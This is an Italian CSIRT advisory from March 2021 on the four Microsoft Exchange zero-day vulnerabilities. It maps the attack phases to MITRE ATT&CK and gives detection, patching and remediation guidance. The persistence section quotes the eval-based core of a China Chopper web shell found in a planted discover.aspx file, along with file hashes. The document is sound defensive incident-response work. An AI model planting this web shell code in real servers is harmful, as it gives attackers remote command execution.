Incidente Microsoft Exchange - Guida alle vulnerabilità e misure di mitigazione - Versione 2.0 - marzo 2021 - Csirt

Pagina creata da Andrea Rocchi
 
CONTINUA A LEGGERE
Incidente Microsoft Exchange - Guida alle vulnerabilità e misure di mitigazione - Versione 2.0 - marzo 2021 - Csirt
Incidente Microsoft Exchange
Guida alle vulnerabilità e misure di mitigazione

             Versione 2.0 – marzo 2021
Incidente Microsoft Exchange - Guida alle vulnerabilità e misure di mitigazione - Versione 2.0 - marzo 2021 - Csirt
Sommario
1.     INTRODUZIONE ........................................................................................................................................... 3
1.1.      Timeline ..................................................................................................................................................... 3
1.2.      Descrizione delle vulnerabilità.................................................................................................................. 4
1.3.      Descrizione delle possibili fasi di sfruttamento delle vulnerabilità. ....................................................... 4
1.3.1.        Ricognizione (T1592.002 Gather Victim Host Information: Software) ................................................ 4
1.3.2.        Preparazione risorse (T1583 Acquire Infrastructure / T1588 Obtain Capabilities) ............................. 4
1.3.3.        Accesso iniziale (TA001 Initial Access / T1190 Exploit Public-Facing Application).............................. 4
1.3.4. Esecuzione (TA002 Execution / T1059 Command and Scripting Interpreter / T1047 Windows
Management Instrumentation / T1559 Inter-Process Communication)............................................................. 5
1.3.5.        Persistenza (TA003 Persistence) ........................................................................................................... 5
1.3.6.        Evasione delle difese (TA005 Defence Evasion) ................................................................................... 6
1.3.7.        Accesso alle credenziali (TA006 Credential Access) ............................................................................. 6
1.3.8.        Movimento laterale (TA008 Lateral Movement) ................................................................................. 6
1.3.9.        Raccolta (TA0009 Collection) ................................................................................................................ 6
1.3.10.       Comando e Controllo (TA0011 Command and Control) ...................................................................... 6
1.3.11.       Esfiltrazione (TA0010 Exfiltration) ........................................................................................................ 6
1.3.12.       Impatto (TA0040 Impact) ...................................................................................................................... 7
2.     MITIGAZIONI ................................................................................................................................................ 8
2.1.      Interim ....................................................................................................................................................... 9
2.2.      Microsoft Safety Scanner ........................................................................................................................ 10
2.3.      Patch ........................................................................................................................................................ 11
3.     ULTERIORI ATTIVITÀ DI RILEVAMENTO MITIGAZIONE E REMEDIATION ................................................... 12
3.1.      Detection ed eventuale contenimento................................................................................................... 12
3.2.      Possibili attività di Mitigation ................................................................................................................. 14
FONTI E RIFERIMENTI ....................................................................................................................................... 16

                                                                                                                                                                2 di 16
1. INTRODUZIONE
  A seguito della pubblicazione da parte di Microsoft di quattro vulnerabilità 0-day impattanti le infrastrutture
  Exchange on-premises sono state avviate le attività di analisi relative alle contromisure da attuare per
  prevenire il possibile sfruttamento delle stesse, affiancate dalle attività di verifica e di risposta da parte dei
  soggetti utilizzatori della suddetta tecnologia.

  Nei successivi paragrafi verranno approfondite le risultanze delle analisi, fornendo, ove possibile, indicazioni
  delle misure di rilevamento, mitigazione ed eradicazione consigliate.

  Tenuto conto della severità delle vulnerabilità trattate, si consiglia di procedere, con ogni possibile urgenza,
  all’applicazione delle mitigazioni suggerite nella sezione “Mitigazioni”, facendo sempre riferimento, per
  l’esecuzione delle stesse, alla rispettiva documentazione ufficiale rilasciata dal vendor. La stessa viene
  costantemente aggiornata (sia in termini di possibilità di rilevamento sia in termini di semplificazione delle
  attività di remediation) con l’evolversi della situazione.

  1.1. Timeline
  In figura 1 viene riassunta la linea temporale degli eventi, riportando i punti salienti delle principali
  comunicazioni effettuate.

                                            Figura 1: Timeline degli eventi

  Risulta particolarmente importante sottolineare l’esistenza di un periodo di circa tre mesi intercorso tra la
  scoperta delle vulnerabilità e la pubblicazione delle prime misure di mitigazione da parte di Microsoft. Durante
  questo periodo gli utilizzatori della tecnologia Exchange sono stati esposti ai rischi generati dalla presenza delle
  vulnerabilità descritte nel successivo paragrafo.

                                                                                                              3 di 16
1.2. Descrizione delle vulnerabilità
    Di seguito vengono descritte le vulnerabilità in esame:
       CVE-2021-26855: vulnerabilità di tipo Server-Side Request Forgery (SSRF) che permetterebbe a un
           attaccante di mandare richieste http illecite e autenticarsi come server Exchange;
       CVE-2021-26857: vulnerabilità di tipo privilege escalation causata da una deserializzazione non sicura
           effettuata dal servizio Unified Messaging, che potrebbe permettere, sotto talune condizioni, di eseguire
           codice arbitrario con diritti di livello SYSTEM sul server Exchange. Lo sfruttamento, in questo caso,
           prescinde dall'esposizione su Internet del servizio Web di Exchange ma richiede i permessi di
           amministratore o l’exploit di un’altra vulnerabilità;
       CVE-2021-26858 e CVE-2021-27065: vulnerabilità che, dopo l'autenticazione, permetterebbero la
           scrittura arbitraria di file su un server Exchange il cui servizio Web sia esposto online. Un attaccante
           autenticato sul server (ad esempio sfruttando la CVE-2021-26855 o compromettendo legittime
           credenziali di amministratore) potrebbe utilizzare queste falle per scrivere un file in qualunque percorso
           del sistema.
    La concatenazione delle suddette vulnerabilità offre ad un attaccante differenti strategie con cui
    compromettere efficientemente un sistema Exchange esposto su Internet.
    1.3. Descrizione delle possibili fasi di sfruttamento delle vulnerabilità.
    Le vulnerabilità descritte, affiancate dai tool/PoC1 disponibili a seguito degli aggiornamenti alla prima
    comunicazione del vendor, consentono anche ad attaccanti non particolarmente sofisticati di raggiungere i
    seguenti macro obiettivi:
      compromissione dell’infrastruttura target;
      mantenimento della persistenza all’interno delle infrastrutture target anche a seguito dell’installazione
          delle patch.
    Di seguito vengono descritte, utilizzando la nomenclatura del framework MITRE ATT&CK, alcune tecniche e
    tattiche, utilizzabili nello sfruttamento delle vulnerabilità in argomento.
      1.3.1. Ricognizione (T1592.002 Gather Victim Host Information: Software)
               In questa fase l’attaccante, utilizzando lo script per la verifica della presenza delle vulnerabilità
               rilasciato da Microsoft2, è in grado di rilevare la presenza di un possibile target e di conoscere se lo
               stesso è o meno vulnerabile.

     1.3.2. Preparazione risorse (T1583 Acquire Infrastructure / T1588 Obtain Capabilities)
            In questa fase l’attaccante predispone tutte le risorse necessarie alla corretta esecuzione e gestione
            dell’attacco. Le attività principali eseguite comportano:
                  T1583.003 Acquire Infrastructure: Virtual Private Server: acquisizione, compromissione,
                   noleggio di risorse Internet, quali ad esempio VPS3 e domain hosting, utilizzate anche allo scopo
                   di ridurre la possibilità di attribuzione in caso di rilevamento da parte del target;
                  T1588.002 Obtain Capabilities: Tool: collezione e/o sviluppo dei tool necessari con particolare
                   riferimento ai tool/PoC utilizzati per lo sfruttamento della vulnerabilità. In questo caso la
                   disponibilità di differenti PoC pubblici4 rende la fase di Weaponization5 accessibile anche ad
                   attori poco sofisticati.

     1.3.3. Accesso iniziale (TA001 Initial Access / T1190 Exploit Public-Facing Application)

1
 Proof of Concept
2
 Tale script (http-vuln-cve2021-26855.nse) è pubblicamente disponibile al link https://github.com/microsoft/CSS-
   Exchange/tree/main/Security ed utilizzabile tramite lo scanner open source Nmap (https://nmap.org/)
3
 Virtual Private Server: server virtuali ospitati di norma presso provider di servizi.
4
 Il vendor Microsoft con un’azione unilaterale ha rimosso dalla piattaforma github (di cui è proprietaria) i primi PoC
   pubblicati ma gli stessi sono stati ulteriormente rilanciati su altre piattaforme quali (tweeter, pastebin, etc).
5
 Processo di trasformazione di una vulnerabilità in un exploit funzionante.
                                                                                                                         4 di 16
In questa fase l’attaccante ottiene il primo accesso all’infrastruttura target. Nel caso specifico la
             vulnerabilità CVE-2021-26855 è sfruttabile da remoto e non richiede alcun tipo di autenticazione, né
             alcuna conoscenza o livello di accesso particolare all’ambiente target. L’attaccante deve solo
             conoscere il server che esegue Exchange e l'account da cui desidera esfiltrare la posta elettronica.
             Tramite le vulnerabilità CVE-2021-26857, CVE-2021-26858 e CVE-2021-27065, l’attaccante ottiene la
             possibilità di eseguire codice arbitrario sui sistemi target. In particolare, la prima vulnerabilità
             consente di ottenere permessi di livello SYSTEM e viene sfruttata per trasferire sul sistema colpito gli
             strumenti di post-exploitation, ad esempio Webshell, ProcDump, PsExec, Mimikatz, Nishang e
             PowerCat, necessari alle successive attività (persistenza, dump dei processi e delle credenziali,
             movimento laterale e download di ulteriori artefatti).

     1.3.4. Esecuzione (TA002 Execution / T1059 Command and Scripting Interpreter / T1047 Windows
            Management Instrumentation / T1559 Inter-Process Communication)
            In questa fase, attraverso il livello di privilegi ottenuto (SYSTEM) e degli strumenti caricati durante la
            fase precedente, l’attaccante è in grado di esercitare il pieno controllo dei sistemi compromessi
            dedicandosi alle attività di esfiltrazione e di movimento laterale, ottenendo la compromissione di
            ulteriori sistemi. In particolare, si rileva l’utilizzo di shell di comandi Windows (T1059.003 Command
            and Scripting Interpreter: Windows Command Shell) attraverso le Web Shell trasferite durante la
            fase precedente.

     1.3.5. Persistenza (TA003 Persistence)
            L’attaccante, a seguito di eventuali azioni di mitigazione come l’installazione degli aggiornamenti
            correttivi delle vulnerabilità utilizzate, la modifica delle credenziali o il semplice riavvio del server,
            potrebbe perdere l’accesso al sistema compromesso. In questa fase l’attaccante esegue dunque le
            attività necessarie al mantenimento dell’accesso ai sistemi compromessi.
            È stato osservato che la persistenza è stata ottenuta tramite:
                  T1505.003 Server Software Component: Web Shell: Attivazione di Web Shell. Con particolare
                   riferimento al caso in esame6 è stato rilevato che gli attaccanti hanno utilizzato Web Shell della
                   famiglia China Chopper. Le stesse si compongono di due parti:
                    una componente server, contenuta all’interno della pagina aspx ospitata dal server
                       Exchange vulnerabile;
                    una componente client, contenuta in un file eseguibile ed ospitata sul sistema
                       dell’attaccante.
                   In merito alla componente server è stato possibile recuperare due file, trattati anche dal CISA7,
                   aventi rispettivamente i seguenti file name e hash MD5:
                    discover.aspx: ca7df873422d59c358397d3cb44ae6aa
                    RedirSuiteServerProxy.aspx: ab3963337cf24dc2ade6406f11901e1f
                   Di seguito si riportano i punti salienti del file discover.aspx:

                          Chiave                  Valore
                          InternalUrl:            https://.com/OAB

                          ExternalUrl:            http://f/function
                                                  Page_Load(){eval(Request[""],"unsafe");}
                          ExchangeVersion:        0.10 (14.0.100.0)

                          WhenCreated:            .AM

6
 Come riportato da FireEye in un’analisi approfondita disponibile al link: https://www.fireeye.com/blog/threat-
  research/2013/08/breaking-down-the-china-chopper-web-shell-part-i.html
7
 https://us-cert.cisa.gov/ncas/analysis-reports/ar21-072b
                                                                                                                  5 di 16
La componente malevola del file aspx risiede nel parametro ExternalUrl il quale, sebbene in
                   uno scenario reale corrisponda8 all’URL utilizzato per accedere dall’esterno alla Virtual
                   Directory, in questo caso contiene la Web Shell.
                  T1136.02 Create Account: Domain Account: Creazione di account di dominio dotati di specifici
                   privilegi necessari a mantenere l’accesso desiderato sui sistemi colpiti.

    1.3.6. Evasione delle difese (TA005 Defence Evasion)
           In questa fase l’attaccante esegue le attività necessarie a ridurre la possibilità di essere rilevato dai
           controlli di sicurezza. Per ottenere questo risultato, nel caso in questione è stato rilevato l’utilizzo
           della tecnica T1036 Masquerading: Match Legitimate Name or Location che prevede il
           mascheramento degli artefatti malevoli mediante la loro ridenominazione in modo similare o
           identico a corrispettivi files legittimi (come log.aspx, logout.aspx, errorPage.aspx, ecc.).

    1.3.7. Accesso alle credenziali (TA006 Credential Access)
           In questa fase avviene il furto delle credenziali presenti nei sistemi colpiti (T1003 OS Credential
           Dumping) ad esempio tramite l’accesso all’archivio locale LSASS (T1003.001 OS Credential Dumping:
           LSASS Memory) o l’esfiltrazione del database di Active Directory NTDS.dit9 il quale contiene, oltre
           alle informazioni riguardanti gli oggetti di tipo utente, i gruppi, l’appartenenza degli utenti agli stessi,
           gli hash delle password (T1003.001 OS Credential Dumping: NTDS).

    1.3.8. Movimento laterale (TA008 Lateral Movement)
           In questa fase, ottenuto l’accesso a credenziali valide, l’attaccante procede alla compromissione di
           ulteriori dispositivi afferenti alla rete compromessa, attraverso ad esempio, l’utilizzo combinato delle
           stesse con gli strumenti caricati precedentemente.

    1.3.9. Raccolta (TA0009 Collection)
           In questa fase l’attaccante raccoglie le informazioni di proprio interesse attraverso ad esempio la
           creazione di archivi compressi (T1560 Archive Collected Data) per la seguente fase di esfiltrazione,
           effettuabile sfruttando utility di compressione di terze parti come 7-Zip o WinRar, caricate anch’esse
           durante la precedente fase di accesso iniziale (T1560.001 - Archive Collected Data: Archive via
           Utility). Ulteriore tecnica riscontrata in questo passo è la collezione di e-mail e informazioni dalle
           mailbox attraverso, ad esempio, l’utilizzo di snap-in Powershell (T1114.002 - Email Collection:
           Remote Email Collection).

    1.3.10. Comando e Controllo (TA0011 Command and Control)
            Questa attività segue l’attaccante per tutta la durata dell’incidente in quanto comprende tutte le
            attività di comunicazione tra l’infrastruttura di controllo messa in opera per l’attività ed i sistemi
            compromessi. Lo sfruttamento delle vulnerabilità in esame consente una vasta gamma di possibilità
            per le attività di C2 ed in particolare di quelle riferibili all’utilizzo dei protocolli applicativi standard in
            modo da ridurre le possibilità di individuazione (T1071 Application Layer Protocol) e, in particolare,
            attraverso l’utilizzo di protocolli comunemente associati a traffico web (HTTP/HTTPS) come nel caso
            delle Web Shell (T1071.001 Application Layer Protocol: WEB Protocols).
    1.3.11. Esfiltrazione (TA0010 Exfiltration)
            In questa fase l’attaccante può procedere con le attività di esfiltrazione dalla rete compromessa delle
            informazioni raccolte. Dato l’elevato livello di permessi ottenibili tramite le vulnerabilità, questa

8
https://docs.microsoft.com/en-us/powershell/module/exchange/set-oabvirtualdirectory?view=exchange-ps#parameters
9
https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-
 2003/cc772829(v=ws.10)?redirectedfrom=MSDN
                                                                                                                    6 di 16
attività potrebbe avvenire da un qualsiasi dispositivo appartenente all’ambiente Active Directory
                compromesso e attraverso differenti modalità quali ad esempio l’utilizzo di servizi cloud (T1567.002
                Exfiltration Over Web Service: Exfiltration to Cloud Storage/T1041 Exfiltration Over C2 Channel).

       1.3.12. Impatto (TA0040 Impact)
               La presenza di PoC pubblici, permettendo lo sfruttamento delle vulnerabilità anche ad attori poco
               sofisticati, potrebbe comportare l’aumento esponenziale degli incidenti legati alle attività di
               esfiltrazione, interruzione o distruzione dei sistemi e/o dei dati. In tali situazioni è altamente
               probabile l’incremento del rilascio di ransomware a scopo estorsivo10 (T1486 Data Encrypted for
               Impact).

10
     https://news.sophos.com/en-us/2021/03/15/dearcry-ransomware-attacks-exploit-exchange-server-vulnerabilities/
                                                                                                                7 di 16
2. MITIGAZIONI
     La mitigazione del rischio non può prescindere dall’analisi della propria infrastruttura, al fine di valutare:

        la presenza delle vulnerabilità;
        la presenza di indicatori di compromissione.

     Per quanto concerne la prima attività è possibile rilevare la presenza delle vulnerabilità nella propria
     infrastruttura attraverso l’utilizzo di uno script per nmap rilasciato da Microsoft e disponibile pubblicamente
     al seguente link:

        https://github.com/microsoft/CSS-Exchange/tree/main/Security.

     Per la seconda attività, in caso non si disponga della capacità interna di verifica degli indicatori di
     compromissione, è possibile utilizzare lo strumento denominato CHIRP (CISA Hunt and Incident Response
     Program), rilasciato inizialmente dal CISA11 per permettere di ricercare, all’interno del sistema, gli IoC relativi
     ai recenti eventi che hanno coinvolto SolarWinds e ActiveDirectory/M365, aggiungendo allo stesso gli
     indicatori relativi alle vulnerabilità in esame rilasciati dal vendor.

     Di seguito vengono elencate ulteriori attività che è possibile effettuare nell’immediatezza per la ricerca di
     eventuali evidenze di compromissione12:

     -   analisi delle modifiche afferenti gli utenti ed i gruppi locali, anche non amministrativi, assicurandosi che
         tutti necessitino di una password per l'accesso;
     -   verifica della possibile creazione di nuovi account (rappresentata dall'ID evento 4720) durante il periodo
         di esposizione del sistema alle vulnerabilità;
     -   reset e randomizzazione delle password degli amministratori locali utilizzando uno strumento quale
         LAPS13;
     -   analisi delle eventuali modifiche alla configurazione RDP14, firewall, subscription WMI e Windows Remote
         Management (WinRM) del sistema che potrebbero essere state effettuate dall'autore dell'attacco per
         garantirsi la persistenza;
     -   ricerca nei log di sistema dell’evento ID 1102 per determinare se eventuali attaccanti abbiano cancellato
         dati dal registro eventi, al fine di coprire le loro tracce;
     -   ricerca della presenza di nuovi meccanismi di persistenza quali servizi imprevisti, attività pianificate ed
         elementi di avvio;
     -   ricerca di tool non precedentemente presenti sui server che eventuali attaccanti potrebbero aver installato
         per garantirsi la persistenza, quali soluzioni RDP non Microsoft e client di accesso remoto;
     -   verifica delle impostazioni di inoltro della posta elettronica a livello mailbox (attributi ForwardingAddress
         e ForwardingSMTPAddress), verifica delle regole di smistamento della posta in arrivo (che potrebbero
         essere utilizzate per inoltrare la posta elettronica esternamente) e verifica della presenza di transport-rules
         di Exchange non impostate precedentemente.
     -   isolamento dei server Exchange dalla rete Internet attraverso l’implementazione di regole di firewalling
         atte a bloccare l’accesso alla porta 443 esposta dal server. Tale azione comporterà l’impossibilità di
         accedere alla propria posta elettronica da parte degli utenti provenienti da Internet. Per mitigare il
         disservizio generato si consiglia di configurare ove possibile connessioni VPN attraverso le quali consentire
         ai propri utenti l’accesso alla posta elettronica.

11
  Cybersecurity and Infrastructure Security Agency
12
  https://www.microsoft.com/security/blog/2021/03/25/analyzing-attacks-taking-advantage-of-the-exchange-server-
   vulnerabilities/
13
   https://www.microsoft.com/en-us/download/details.aspx?id=46899
14
  Remote Desktop Protocol: sistema di accesso remoto al server.
                                                                                                                 8 di 16
In caso dovesse essere rilevata la presenza di Webshell è consigliato inoltre procedere con le seguenti attività:

     -   copia forense (ove possibile) del server;
     -   disconnessione fisica o virtuale (tramite ad esempio regole di firewalling) del server Exchange dalla rete;
     -   riavvio del server;
     -   stop del servizio W3WP;
     -   rimozione di tutti i file aspx malevoli identificati precedentemente;
     -   rimozione di tutti i file temporanei ASP.NET utilizzando il seguente script rilasciato da Microsoft:
         iisreset /stop
         $tempAspDir                                                                                                 =
         "$env:Windir\Microsoft.NET\Framework64\$([System.Runtime.InteropServices.RuntimeEnvironment]::Ge
         tSystemVersion())\Temporary ASP.NET Files"
         mkdir 'C:\forensicbackup'
         Copy-Item -Recurse -Path $tempAspDir -Destination 'C:\forensicbackup'
         rm -r -Force $tempAspDir
         iisreset /start

     È inoltre possibile seguire le modalità di mitigazione indicate dal vendor Microsoft, ad esempio attraverso
     l’utilizzo del tool MSERT per la rilevazione e la rimozione di eventuali artefatti malevoli.

     In particolare Microsoft ha rilasciato le seguenti modalità di intervento:

        mitigazione provvisoria (Interim), pensata per quegli utenti che non dispongono di un’area IT/Security e/o
         per quegli utenti che non hanno familiarità coi processi di aggiornamento o non possono provvedere
         nell’immediato all’applicazione delle patch di sicurezza;
        installazione degli aggiornamenti di sicurezza sul prodotto on-premises;
        utilizzo di Microsoft Defender e System Center Endpoint Protection per mitigare temporaneamente la
         suddetta vulnerabilità in maniera automatica, senza nessuna interazione da parte dell’utente, che deve,
         quindi, assicurarsi di avere gli aggiornamenti automatici attivi e/o di aver installato almeno la build
         1.333.747.015.

     Si riporta, di seguito, il dettaglio delle soluzioni elencate.

     2.1. Interim

     Le mitigazioni provvisore, pensate per far fronte immediatamente, seppur in maniera temporanea, alla
     vulnerabilità identificata dalla CVE 2021-26855, sono distribuite attraverso alcuni strumenti pubblicati
     sull’apposita pagina Github Microsoft:

     https://github.com/microsoft/CSS-Exchange/tree/main/Security .

     In particolare, lo script che Microsoft raccomanda di eseguire con la massima urgenza denominato EOMT16
     (Exchange On-premises Mitigation Tool), contiene una serie di istruzioni PowerShell che svolgono,
     sostanzialmente, tre macro operazioni:

        implementazione di alcune URL Rewrite in IIS (Internet Information Services);
        installazione di Microsoft Safety Scanner e successiva analisi del server Exchange (in modalità quick scan).
         Qualora ci fosse il sospetto di una possibile compromissione, lo scanner andrà avviato in modalità full;
        tentativo di mitigazione delle potenziali evidenze rilevate dal software.

15
  https://www.microsoft.com/security/blog/2021/03/18/automatic-on-premises-exchange-server-mitigation-now-in-
   microsoft-defender-antivirus/
16
  https://github.com/microsoft/CSS-Exchange/releases/latest/download/EOMT.ps1
                                                                                                               9 di 16
Di seguito i requisiti di sistema17 in termini di versioni da soddisfare prima di procedere a questo tipo di
     mitigazione:

        PowerShell >= 3
        IIS >= 7.5
        Exchange 2013, Exchange 2016 o Exchange 2019
        Windows Server 2008 R2, Server 2012, Server 2012 R2, Server 2016 o Server 2019

     Va specificato che questo tipo di soluzione (temporanea) può essere applicata solo se i server Exchange sono
     provvisti di connessione Internet e se è possibile eseguire PowerShell con diritti di amministrazione.

     2.2. Microsoft Safety Scanner

     Microsoft Safety Scanner è uno strumento rilasciato da Microsoft per cercare e rimuovere codice malevolo
     (malware) dal computer. Una volta scaricato18 si potrà scegliere se:

         effettuare una scansione completa (full scan) la quale, a discapito della quantità di tempo impiegata,
          fornisce un’analisi più completa, andando a scansionare tutti i file presenti nel PC;
         consultare i risultati della scansione generati in %SYSTEMROOT%\debug\msert.log;
         Effettuare una scansione personalizzata (customized scan) al fine di ricercare i file malevoli solo all’interno
          delle cartelle tipicamente utilizzate dagli attori malevoli, ovvero:
           %IIS installation path%\aspnet_client\*
             %IIS installation path%\aspnet_client\system_web\*
             %Exchange Server installation path%\FrontEnd\HttpProxy\owa\auth\*
             Configured temporary ASP.NET files path
             %Exchange Server Installation%\FrontEnd\HttpProxy\ecp\auth\*
     Tuttavia Microsoft non ne garantisce l’efficacia per tutte le possibili modalità di attacco poiché l’analisi si basa
     sui pattern utilizzati dagli attori malevoli recentemente osservati e per eventuali problemi scaturiti a seguito
     dall’utilizzo del tool si rimanda alla pagina ufficiale19.

     Per mitigare le quattro vulnerabilità in oggetto, Microsoft ha inizialmente rilasciato il tool denominato
     ExchangeMitigation.ps1, la cui esecuzione potrebbe tuttavia causare i disservizi sintetizzati nella seguente
     tabella:

      Vulnerabilità         Mitigazione                                        Disservizi
      CVE-2021-26857 Disabilitazione dei servizi di messaggistica              Interruzione dei servizi di
                            unificata (UM Service)                             messaggistica e di voice mail
      CVE-2021-27065 Disabilitazione dell’applicazione Exchange                Errore 503 nell’utilizzo di ECP che
                            Control Panel (ECP)                                risulterà offline
      CVE-2021-26858 Disabilitazione del servizio di rubrica offline           Errore 503 nell’utilizzo del servizio
                            (OAB, Offline Address Book)                        OAB
     L’utilizzo di tale tool è consigliato in caso i server Exchange non abbiano connettività Internet.

17
   https://github.com/microsoft/CSS-Exchange/tree/main/Security#system-requirements
18
   https://docs.microsoft.com/en-us/windows/security/threat-protection/intelligence/safety-scanner-download
19
   https://support.microsoft.com/kb/2520970
                                                                                                                 10 di 16
2.3. Patch

     Le patch ufficiali rilasciate da Microsoft sono, al momento, le uniche soluzioni consigliate dal vendor come
     efficaci e durature, e sono suddivise per versione di Exchange. I relativi link alle pagine di aggiornamento sono
     riportati di seguito:

        Exchange 201020 per il quale è richiesto Service Pack 3;
        Exchange 201321 per il quale è richiesto Aggiornamento Cumulativo (Cumulative Update) 23;
        Exchange 201622 per il quale è richiesto Aggiornamento Cumulativo (Cumulative Update) 19 o 18;
        Exchange 201923 per il quale è richiesto Aggiornamento Cumulativo (Cumulative Update) 8 o 7;
        Per gli aggiornamenti cumulativi rilasciati in precedenza è disponibile, invece, l’apposita guida24.

     Nel caso in cui si scelga questo tipo di aggiornamento, Microsoft consiglia comunque l’esecuzione dello script
     EOMT.ps1 (trattato nella sezione Interim) al fine di ricercare l’esistenza di Indicatori di Compromissione.

20
  https://support.microsoft.com/en-us/topic/description-of-the-security-update-for-microsoft-exchange-server-2010-
   service-pack-3-march-2-2021-kb5000978-894f27bf-281e-44f8-b9ba-dad705534459
21
  https://support.microsoft.com/en-us/topic/description-of-the-security-update-for-microsoft-exchange-server-2019-2016-
   and-2013-march-2-2021-kb5000871-9800a6bb-0a21-4ee7-b9da-fa85b3e1d23b
22
  https://support.microsoft.com/en-us/topic/description-of-the-security-update-for-microsoft-exchange-server-2019-2016-
   and-2013-march-2-2021-kb5000871-9800a6bb-0a21-4ee7-b9da-fa85b3e1d23b
23
  https://support.microsoft.com/en-us/topic/description-of-the-security-update-for-microsoft-exchange-server-2019-2016-
   and-2013-march-2-2021-kb5000871-9800a6bb-0a21-4ee7-b9da-fa85b3e1d23b
24
  https://techcommunity.microsoft.com/t5/exchange-team-blog/march-2021-exchange-server-security-updates-for-older-
   cumulative/ba-p/2192020
                                                                                                                11 di 16
3. ULTERIORI ATTIVITÀ DI RILEVAMENTO MITIGAZIONE E REMEDIATION

     Data l’elevata possibilità che un attaccante attraverso lo sfruttamento delle vulnerabilità possa
     compromettere l’intera infrastruttura Active Directory25 vengono indicate di seguito delle indicazioni di
     massima per le attività di rilevamento, contenimento e mitigazione in tali ambienti.

     3.1. Detection ed eventuale contenimento

     Le attività di detection prevedono il monitoraggio degli indicatori di attività anomala quali:

        utilizzo anomalo di credenziali di amministrazione;
        autenticazioni effettuate tramite account di personale non presente e/o in orari anomali;
        creazione non prevista (dal processo interno di provisioning) di nuovi account;
        attività anomala effettuata da account validi (es. tentativi di accesso a risorse non autorizzate e richiesta
         di privilegi aggiuntivi non necessari);
        rilevamento di eseguibili e/o artefatti malevoli o utilizzabili in maniera malevola (PsExec, Mimikatz, script
         Powershell);
        impiego di account multipli, privilegiati e non, utilizzati in un tempo ristretto dalla stessa postazione e/o
         da postazioni non comunemente utilizzate allo scopo (es. in sedi diverse nello stesso arco temporale);
        modifiche di servizi sensibili (es. appartenenza ad un gruppo amministrativo su Active directory);
        utilizzo di account differenti per l’accesso perimetrale (es. VPN) e l’utilizzo di risorse interne (se non
         previsto).

     Il monitoraggio del movimento laterale attraverso la registrazione dei seguenti Windows Event ID:

        Event ID 4688: creazione di un nuovo processo, analizzando i campi Account Name e New process Name;
        Event ID 4648: tentativo di logon utilizzando credenziali esplicite, analizzando i campi Account Name
         (Subject), Account Name (account di cui sono state utilizzate le credenziali), Process Name;
        Event ID 4624: un account è stato autenticato con successo, analizzando i campi: Account Name, Logon
         type. In particolare il logon type da ricercare è il network logon;
        Event ID 4769: richiesta di un ticket di servizio Kerberos, analizzando i campi: Account Name, Service Name,
         Client Address;
        Event ID 4768: richiesta di un ticket di autenticazione (TGT) Kerberos, analizzando i campi: Account Name,
         Service Name, Client Address;
        Event ID 4776: il Domain controller ha cercato di validare le credenziali di un account, analizzando i campi:
         Logon Account, Source Workstation;
        Event ID 100: tentativo di autenticazione NLTM;
        Event ID 104: tentativo di utilizzo di DES o RC4 per l’autenticazione Kerberos Authentication;
        Event ID 105: l’autenticazione Kerberos da un particolare dispositivo non è permessa;
        Event ID 106: l’utente o il device non è autorizzato ad autenticarsi al server;
        Event ID 305: la richiesta di un token Kerberos TGT viola le restrizioni;
        Event ID 306: l’utente il device od entrambi violano le restrizioni imposte;
        Event ID 3065: il controllo di verifica di integrità ha rilevato un driver che non rispetta i requisiti di sicurezza;
        Event ID 3066: l’evento rileva che un processo (di solito lssas.exe) ha caricato un driver che non rispetta I
         requisiti di firma digitale del software.

25
 https://download.microsoft.com/download/7/7/A/77ABC5BD-8320-41AF-863C-6ECFB10CB4B9/Mitigating-Pass-the-
 Hash-Attacks-and-Other-Credential-Theft-Version-2.pdf
                                                                                                                     12 di 16
Al riguardo, si coglie l’occasione per far presente che la raccolta dei suddetti eventi dovrebbe essere
centralizzata possibilmente attraverso un’infrastruttura SIEM allo scopo di correlare automaticamente gli
stessi e consentire di individuare le postazioni compromesse per la loro successiva analisi.

L’ individuazione e verifica di tutte le utenze con privilegi elevati ovvero le utenze presenti nei seguenti gruppi
(ed in gruppi custom eventualmente dipendenti):

   Enterprise Admins
   Domain Admins
   Schema Admin
   BUILTIN\Administrators
   Account Operators
   Backup Operators
   Print Operators
   Server Operators
   Domain Controllers
   Read-only Domain Controllers
   Group Policy Creator Owners
   Cryptographic Operators
   Distributed COM Users
   Gruppi sensibili relativi ad installazioni Exchange on-premises (inclusi Exchange Windows Permissions ed
    Exchange Trusted Subsystem)
   Ogni utente amministrativo locale utilizzato per attività legate al sistema operativo inclusi i membri del
    gruppo amministratori locali;

In caso di anomalia, andrebbe valutata come azione di contenimento la cancellazione delle utenze presenti in
questi gruppi e la loro successiva nuova creazione, in modo da ridurre la possibilità che l’attaccante possa
trovare gli hash delle stesse depositati su postazioni di lavoro ed utilizzarle per scalare i propri privilegi.

L’ individuazione e verifica di tutte le utenze a cui sono stati delegati particolari permessi, nello specifico:

   account di servizio utilizzati per l’installazione di software e/o aggiornamenti;
   account di servizio utilizzati per eseguire scansioni di sicurezza;
   account di servizio utilizzati per eseguire i Backup;
   account di servizio utilizzati per il corretto funzionamento dei servizi (es. account di servizio di Sharepoint,
    SQL server, Print Servers, File Server, LDAP browsing);

L’individuazione delle postazioni di lavoro e dei server sui quali è necessario utilizzare gli account con privilegi
elevati ad esempio:

   server di erogazione dei servizi;
   postazioni utilizzate dagli amministratori di dominio e/o dei servizi;
   server dedicati agli aggiornamenti di sistema;
   server utilizzati per scansioni di sicurezza;

Tutti gli asset di questa tipologia non dovrebbero avere connettività diretta alla rete Internet (ad esempio
attraverso regole di firewalling) e in caso di incidenti, ove possibile, dovrebbero essere reinstallati
completamente.

                                                                                                            13 di 16
3.2. Possibili attività di Mitigation

     Le possibili mitigazioni da porre in essere allorquando si dovessero rilevare eventi simili sono le seguenti:

        Backup dei sistemi coinvolti su volumi offline con particolare attenzione alle infrastrutture Domain
         Controller (ove presenti) effettuando un full backup (https://activedirectorypro.com/backup-active-
         directory/)
      Aggiornamento delle soluzioni antivirus ed antimalware con particolare attenzione alle componenti
         comportamentali degli stessi (ove disponibili);
      Implementazione di sistemi di autenticazione multifattore (MFA/2FA) con particolare attenzione ai servizi
         esposti sulla rete Internet;
      Reset delle credenziali degli utenti a prescindere se le stesse risultino compromesse o meno;
      Implementazione di sistemi di verifica della complessità delle password e riduzione dei tempi di durata
         delle stesse;
      Verifica della propria superficie di esposizione ponendo particolare attenzione ad infrastrutture datate e/o
         non più necessarie;
      Verifica del proprio processo di patch management e verifica che tutte le infrastrutture gestite siano
         aggiornate alle ultime release offerte dal produttore;
      Limitazione dell’accesso alla rete Internet delle postazioni di lavoro attraverso l’utilizzo di sistemi di Web
         Content Filtering e Web isolation;
